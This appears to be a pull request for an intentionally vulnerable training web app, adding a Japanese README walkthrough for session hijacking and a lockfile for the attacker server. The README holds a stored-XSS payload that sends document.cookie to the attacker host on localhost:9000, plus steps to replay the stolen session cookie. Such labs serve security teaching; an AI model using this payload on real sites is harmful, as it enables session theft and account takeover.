### PR TITLE
feat: add session hijacking hands-on flow

### DIFF
--- a/README.md
+++ b/README.md
@@ -55,6 +55,9 @@ docker compose up
 - **XSS**:
   - `/search` の検索語が無エスケープで反映（反射型）
   - `/products/:id` のコメントが無エスケープで表示（保存型）
+- **セッションハイジャック**:
+  - `httpOnly: false` のセッションCookieを、保存型XSSから `document.cookie` で盗める
+  - Attacker の `/session-hijack` で stolen cookie を確認し、`/orders` へ再利用できる
 - **SQL Injection**:
   - `/login` のユーザー名/パスワードが文字列結合SQL
   - `/search` の `q` が文字列結合SQL（UNION/コメント構文が有効）
@@ -64,6 +67,19 @@ docker compose up
   - Attacker の `/auto-purchase` で購入リクエストを自動送信
 
 詳しい手順は起動後に画面内の「Hands-on」リンクを参照してください（Shop側に手順を表示します）。
+
+## セッションハイジャックの再現手順
+
+1. `alice / password123` で Shop にログインし、`/products/1` を開く
+2. コメント欄に次の payload を投稿する
+
+```html
+<script>fetch('http://localhost:9000/collect?cookie=' + encodeURIComponent(document.cookie))</script>
+```
+
+3. 商品詳細を再表示し、保存型XSSで Cookie が Attacker 側へ送られることを発生させる
+4. `http://localhost:9000/session-hijack` を開き、盗まれた `connect.sid` が表示されることを確認する
+5. 「盗んだセッションで注文履歴を見る」を押し、被害者のログイン状態で `/orders` を閲覧できることを確認する
 
 ## 注意
 

--- a/apps/attacker/package-lock.json
+++ b/apps/attacker/package-lock.json
@@ -1,0 +1,814 @@
+{
+  "name": "attacker-site",
+  "version": "0.1.0",
+  "lockfileVersion": 3,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "attacker-site",
+      "version": "0.1.0",
+      "dependencies": {
+        "express": "4.21.2",
+        "morgan": "1.10.0"
+      }
+    },
+    "node_modules/accepts": {
+      "version": "1.3.8",
+      "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz",
+      "integrity": "sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==",
+      "dependencies": {
+        "mime-types": "~2.1.34",
+        "negotiator": "0.6.3"
+      },
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/array-flatten": {
+      "version": "1.1.1",
+      "resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz",
+      "integrity": "sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg=="
+    },
+    "node_modules/basic-auth": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz",
+      "integrity": "sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==",
+      "dependencies": {
+        "safe-buffer": "5.1.2"
+      },
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/basic-auth/node_modules/safe-buffer": {
+      "version": "5.1.2",
+      "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz",
+      "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g=="
+    },
+    "node_modules/body-parser": {
+      "version": "1.20.3",
+      "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.20.3.tgz",
+      "integrity": "sha512-7rAxByjUMqQ3/bHJy7D6OGXvx/MMc4IqBn/X0fcM1QUcAItpZrBEYhWGem+tzXH90c+G01ypMcYJBO9Y30203g==",
+      "dependencies": {
+        "bytes": "3.1.2",
+        "content-type": "~1.0.5",
+        "debug": "2.6.9",
+        "depd": "2.0.0",
+        "destroy": "1.2.0",
+        "http-errors": "2.0.0",
+        "iconv-lite": "0.4.24",
+        "on-finished": "2.4.1",
+        "qs": "6.13.0",
+        "raw-body": "2.5.2",
+        "type-is": "~1.6.18",
+        "unpipe": "1.0.0"
+      },
+      "engines": {
+        "node": ">= 0.8",
+        "npm": "1.2.8000 || >= 1.4.16"
+      }
+    },
+    "node_modules/bytes": {
+      "version": "3.1.2",
+      "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz",
+      "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==",
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/call-bind-apply-helpers": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz",
+      "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==",
+      "dependencies": {
+        "es-errors": "^1.3.0",
+        "function-bind": "^1.1.2"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      }
+    },
+    "node_modules/call-bound": {
+      "version": "1.0.4",
+      "resolved": "https://registry.npmjs.org/call-bound/-/call-bound-1.0.4.tgz",
+      "integrity": "sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg==",
+      "dependencies": {
+        "call-bind-apply-helpers": "^1.0.2",
+        "get-intrinsic": "^1.3.0"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/content-disposition": {
+      "version": "0.5.4",
+      "resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz",
+      "integrity": "sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==",
+      "dependencies": {
+        "safe-buffer": "5.2.1"
+      },
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/content-type": {
+      "version": "1.0.5",
+      "resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz",
+      "integrity": "sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/cookie": {
+      "version": "0.7.1",
+      "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.7.1.tgz",
+      "integrity": "sha512-6DnInpx7SJ2AK3+CTUE/ZM0vWTUboZCegxhC2xiIydHR9jNuTAASBrfEpHhiGOZw/nX51bHt6YQl8jsGo4y/0w==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/cookie-signature": {
+      "version": "1.0.6",
+      "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz",
+      "integrity": "sha512-QADzlaHc8icV8I7vbaJXJwod9HWYp8uCqf1xa4OfNu1T7JVxQIrUgOWtHdNDtPiywmFbiS12VjotIXLrKM3orQ=="
+    },
+    "node_modules/debug": {
+      "version": "2.6.9",
+      "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz",
+      "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==",
+      "dependencies": {
+        "ms": "2.0.0"
+      }
+    },
+    "node_modules/depd": {
+      "version": "2.0.0",
+      "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz",
+      "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==",
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/destroy": {
+      "version": "1.2.0",
+      "resolved": "https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz",
+      "integrity": "sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==",
+      "engines": {
+        "node": ">= 0.8",
+        "npm": "1.2.8000 || >= 1.4.16"
+      }
+    },
+    "node_modules/dunder-proto": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz",
+      "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==",
+      "dependencies": {
+        "call-bind-apply-helpers": "^1.0.1",
+        "es-errors": "^1.3.0",
+        "gopd": "^1.2.0"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      }
+    },
+    "node_modules/ee-first": {
+      "version": "1.1.1",
+      "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz",
+      "integrity": "sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow=="
+    },
+    "node_modules/encodeurl": {
+      "version": "2.0.0",
+      "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz",
+      "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==",
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/es-define-property": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz",
+      "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==",
+      "engines": {
+        "node": ">= 0.4"
+      }
+    },
+    "node_modules/es-errors": {
+      "version": "1.3.0",
+      "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz",
+      "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==",
+      "engines": {
+        "node": ">= 0.4"
+      }
+    },
+    "node_modules/es-object-atoms": {
+      "version": "1.1.1",
+      "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz",
+      "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==",
+      "dependencies": {
+        "es-errors": "^1.3.0"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      }
+    },
+    "node_modules/escape-html": {
+      "version": "1.0.3",
+      "resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz",
+      "integrity": "sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow=="
+    },
+    "node_modules/etag": {
+      "version": "1.8.1",
+      "resolved": "https://registry.npmjs.org/etag/-/etag-1.8.1.tgz",
+      "integrity": "sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/express": {
+      "version": "4.21.2",
+      "resolved": "https://registry.npmjs.org/express/-/express-4.21.2.tgz",
+      "integrity": "sha512-28HqgMZAmih1Czt9ny7qr6ek2qddF4FclbMzwhCREB6OFfH+rXAnuNCwo1/wFvrtbgsQDb4kSbX9de9lFbrXnA==",
+      "dependencies": {
+        "accepts": "~1.3.8",
+        "array-flatten": "1.1.1",
+        "body-parser": "1.20.3",
+        "content-disposition": "0.5.4",
+        "content-type": "~1.0.4",
+        "cookie": "0.7.1",
+        "cookie-signature": "1.0.6",
+        "debug": "2.6.9",
+        "depd": "2.0.0",
+        "encodeurl": "~2.0.0",
+        "escape-html": "~1.0.3",
+        "etag": "~1.8.1",
+        "finalhandler": "1.3.1",
+        "fresh": "0.5.2",
+        "http-errors": "2.0.0",
+        "merge-descriptors": "1.0.3",
+        "methods": "~1.1.2",
+        "on-finished": "2.4.1",
+        "parseurl": "~1.3.3",
+        "path-to-regexp": "0.1.12",
+        "proxy-addr": "~2.0.7",
+        "qs": "6.13.0",
+        "range-parser": "~1.2.1",
+        "safe-buffer": "5.2.1",
+        "send": "0.19.0",
+        "serve-static": "1.16.2",
+        "setprototypeof": "1.2.0",
+        "statuses": "2.0.1",
+        "type-is": "~1.6.18",
+        "utils-merge": "1.0.1",
+        "vary": "~1.1.2"
+      },
+      "engines": {
+        "node": ">= 0.10.0"
+      },
+      "funding": {
+        "type": "opencollective",
+        "url": "https://opencollective.com/express"
+      }
+    },
+    "node_modules/finalhandler": {
+      "version": "1.3.1",
+      "resolved": "https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.1.tgz",
+      "integrity": "sha512-6BN9trH7bp3qvnrRyzsBz+g3lZxTNZTbVO2EV1CS0WIcDbawYVdYvGflME/9QP0h0pYlCDBCTjYa9nZzMDpyxQ==",
+      "dependencies": {
+        "debug": "2.6.9",
+        "encodeurl": "~2.0.0",
+        "escape-html": "~1.0.3",
+        "on-finished": "2.4.1",
+        "parseurl": "~1.3.3",
+        "statuses": "2.0.1",
+        "unpipe": "~1.0.0"
+      },
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/forwarded": {
+      "version": "0.2.0",
+      "resolved": "https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz",
+      "integrity": "sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/fresh": {
+      "version": "0.5.2",
+      "resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz",
+      "integrity": "sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/function-bind": {
+      "version": "1.1.2",
+      "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz",
+      "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==",
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/get-intrinsic": {
+      "version": "1.3.0",
+      "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz",
+      "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==",
+      "dependencies": {
+        "call-bind-apply-helpers": "^1.0.2",
+        "es-define-property": "^1.0.1",
+        "es-errors": "^1.3.0",
+        "es-object-atoms": "^1.1.1",
+        "function-bind": "^1.1.2",
+        "get-proto": "^1.0.1",
+        "gopd": "^1.2.0",
+        "has-symbols": "^1.1.0",
+        "hasown": "^2.0.2",
+        "math-intrinsics": "^1.1.0"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/get-proto": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz",
+      "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==",
+      "dependencies": {
+        "dunder-proto": "^1.0.1",
+        "es-object-atoms": "^1.0.0"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      }
+    },
+    "node_modules/gopd": {
+      "version": "1.2.0",
+      "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz",
+      "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==",
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/has-symbols": {
+      "version": "1.1.0",
+      "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz",
+      "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==",
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/hasown": {
+      "version": "2.0.2",
+      "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz",
+      "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==",
+      "dependencies": {
+        "function-bind": "^1.1.2"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      }
+    },
+    "node_modules/http-errors": {
+      "version": "2.0.0",
+      "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-2.0.0.tgz",
+      "integrity": "sha512-FtwrG/euBzaEjYeRqOgly7G0qviiXoJWnvEH2Z1plBdXgbyjv34pHTSb9zoeHMyDy33+DWy5Wt9Wo+TURtOYSQ==",
+      "dependencies": {
+        "depd": "2.0.0",
+        "inherits": "2.0.4",
+        "setprototypeof": "1.2.0",
+        "statuses": "2.0.1",
+        "toidentifier": "1.0.1"
+      },
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/iconv-lite": {
+      "version": "0.4.24",
+      "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz",
+      "integrity": "sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==",
+      "dependencies": {
+        "safer-buffer": ">= 2.1.2 < 3"
+      },
+      "engines": {
+        "node": ">=0.10.0"
+      }
+    },
+    "node_modules/inherits": {
+      "version": "2.0.4",
+      "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz",
+      "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ=="
+    },
+    "node_modules/ipaddr.js": {
+      "version": "1.9.1",
+      "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz",
+      "integrity": "sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==",
+      "engines": {
+        "node": ">= 0.10"
+      }
+    },
+    "node_modules/math-intrinsics": {
+      "version": "1.1.0",
+      "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz",
+      "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==",
+      "engines": {
+        "node": ">= 0.4"
+      }
+    },
+    "node_modules/media-typer": {
+      "version": "0.3.0",
+      "resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz",
+      "integrity": "sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/merge-descriptors": {
+      "version": "1.0.3",
+      "resolved": "https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz",
+      "integrity": "sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==",
+      "funding": {
+        "url": "https://github.com/sponsors/sindresorhus"
+      }
+    },
+    "node_modules/methods": {
+      "version": "1.1.2",
+      "resolved": "https://registry.npmjs.org/methods/-/methods-1.1.2.tgz",
+      "integrity": "sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/mime": {
+      "version": "1.6.0",
+      "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz",
+      "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==",
+      "bin": {
+        "mime": "cli.js"
+      },
+      "engines": {
+        "node": ">=4"
+      }
+    },
+    "node_modules/mime-db": {
+      "version": "1.52.0",
+      "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz",
+      "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/mime-types": {
+      "version": "2.1.35",
+      "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz",
+      "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==",
+      "dependencies": {
+        "mime-db": "1.52.0"
+      },
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/morgan": {
+      "version": "1.10.0",
+      "resolved": "https://registry.npmjs.org/morgan/-/morgan-1.10.0.tgz",
+      "integrity": "sha512-AbegBVI4sh6El+1gNwvD5YIck7nSA36weD7xvIxG4in80j/UoK8AEGaWnnz8v1GxonMCltmlNs5ZKbGvl9b1XQ==",
+      "dependencies": {
+        "basic-auth": "~2.0.1",
+        "debug": "2.6.9",
+        "depd": "~2.0.0",
+        "on-finished": "~2.3.0",
+        "on-headers": "~1.0.2"
+      },
+      "engines": {
+        "node": ">= 0.8.0"
+      }
+    },
+    "node_modules/morgan/node_modules/on-finished": {
+      "version": "2.3.0",
+      "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz",
+      "integrity": "sha512-ikqdkGAAyf/X/gPhXGvfgAytDZtDbr+bkNUJ0N9h5MI/dmdgCs3l6hoHrcUv41sRKew3jIwrp4qQDXiK99Utww==",
+      "dependencies": {
+        "ee-first": "1.1.1"
+      },
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/ms": {
+      "version": "2.0.0",
+      "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz",
+      "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A=="
+    },
+    "node_modules/negotiator": {
+      "version": "0.6.3",
+      "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz",
+      "integrity": "sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/object-inspect": {
+      "version": "1.13.4",
+      "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz",
+      "integrity": "sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew==",
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/on-finished": {
+      "version": "2.4.1",
+      "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz",
+      "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==",
+      "dependencies": {
+        "ee-first": "1.1.1"
+      },
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/on-headers": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/on-headers/-/on-headers-1.0.2.tgz",
+      "integrity": "sha512-pZAE+FJLoyITytdqK0U5s+FIpjN0JP3OzFi/u8Rx+EV5/W+JTWGXG8xFzevE7AjBfDqHv/8vL8qQsIhHnqRkrA==",
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/parseurl": {
+      "version": "1.3.3",
+      "resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz",
+      "integrity": "sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==",
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/path-to-regexp": {
+      "version": "0.1.12",
+      "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.12.tgz",
+      "integrity": "sha512-RA1GjUVMnvYFxuqovrEqZoxxW5NUZqbwKtYz/Tt7nXerk0LbLblQmrsgdeOxV5SFHf0UDggjS/bSeOZwt1pmEQ=="
+    },
+    "node_modules/proxy-addr": {
+      "version": "2.0.7",
+      "resolved": "https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz",
+      "integrity": "sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==",
+      "dependencies": {
+        "forwarded": "0.2.0",
+        "ipaddr.js": "1.9.1"
+      },
+      "engines": {
+        "node": ">= 0.10"
+      }
+    },
+    "node_modules/qs": {
+      "version": "6.13.0",
+      "resolved": "https://registry.npmjs.org/qs/-/qs-6.13.0.tgz",
+      "integrity": "sha512-+38qI9SOr8tfZ4QmJNplMUxqjbe7LKvvZgWdExBOmd+egZTtjLB67Gu0HRX3u/XOq7UU2Nx6nsjvS16Z9uwfpg==",
+      "dependencies": {
+        "side-channel": "^1.0.6"
+      },
+      "engines": {
+        "node": ">=0.6"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/range-parser": {
+      "version": "1.2.1",
+      "resolved": "https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz",
+      "integrity": "sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==",
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/raw-body": {
+      "version": "2.5.2",
+      "resolved": "https://registry.npmjs.org/raw-body/-/raw-body-2.5.2.tgz",
+      "integrity": "sha512-8zGqypfENjCIqGhgXToC8aB2r7YrBX+AQAfIPs/Mlk+BtPTztOvTS01NRW/3Eh60J+a48lt8qsCzirQ6loCVfA==",
+      "dependencies": {
+        "bytes": "3.1.2",
+        "http-errors": "2.0.0",
+        "iconv-lite": "0.4.24",
+        "unpipe": "1.0.0"
+      },
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/safe-buffer": {
+      "version": "5.2.1",
+      "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz",
+      "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==",
+      "funding": [
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/feross"
+        },
+        {
+          "type": "patreon",
+          "url": "https://www.patreon.com/feross"
+        },
+        {
+          "type": "consulting",
+          "url": "https://feross.org/support"
+        }
+      ]
+    },
+    "node_modules/safer-buffer": {
+      "version": "2.1.2",
+      "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz",
+      "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg=="
+    },
+    "node_modules/send": {
+      "version": "0.19.0",
+      "resolved": "https://registry.npmjs.org/send/-/send-0.19.0.tgz",
+      "integrity": "sha512-dW41u5VfLXu8SJh5bwRmyYUbAoSB3c9uQh6L8h/KtsFREPWpbX1lrljJo186Jc4nmci/sGUZ9a0a0J2zgfq2hw==",
+      "dependencies": {
+        "debug": "2.6.9",
+        "depd": "2.0.0",
+        "destroy": "1.2.0",
+        "encodeurl": "~1.0.2",
